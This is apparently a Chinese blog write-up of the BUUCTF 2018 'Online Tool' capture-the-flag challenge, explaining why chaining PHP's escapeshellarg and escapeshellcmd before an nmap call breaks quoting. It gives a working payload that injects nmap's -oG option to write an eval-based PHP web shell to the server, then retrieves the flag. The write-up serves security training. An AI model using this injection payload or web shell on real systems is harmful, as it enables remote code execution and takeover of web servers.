[BUUCTF 2018]Online Tool

打开就是php代码

 <?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这里的escapeshellarg作用是:1,确保用户值传递一个参数给命令2,用户不能指定更多的参数3,用户不能执行不同的命令

escapeshellcmd的作用是:1,确保用户只执行一个命令2,用户可以指定不限数量的参数3,用户不能执行不同的命令

escapeshellarg处理后先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

例如:

127.0.0.1' -oG  escapeshellarg -> '127.0.0.1'\'' -oG '

escapeshellcmd  ->   '127.0.0.1'\\'' -oG \'

就是将不成对的单引号及任意\进行添加\的操作

nmap参数中 -oG可以进行文件写入

所以payload为:

?host='<?php eval($_POST[1]);?> -oG shell.php '

经过两个函数的处理后变为''\\'' \<\?php eval\(\$_POST\[1\]\)\;\?\> -oG shell.php '\\'''

将该闭合的引号闭合上,忽略这些闭合的引号就变为了:

\ <?php eval($_POST[1]);?> -oG shell.php \\

之后访问

这个目录下的shell.php

 得到flag

参考:谈谈escapeshellarg参数绕过和注入的问题

           PHP escapeshellarg()+escapeshellcmd() 之殇

           buuctf-[BUUCTF 2018]Online Tool(小宇特详解)_小宇特详解的博客-CSDN博客

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值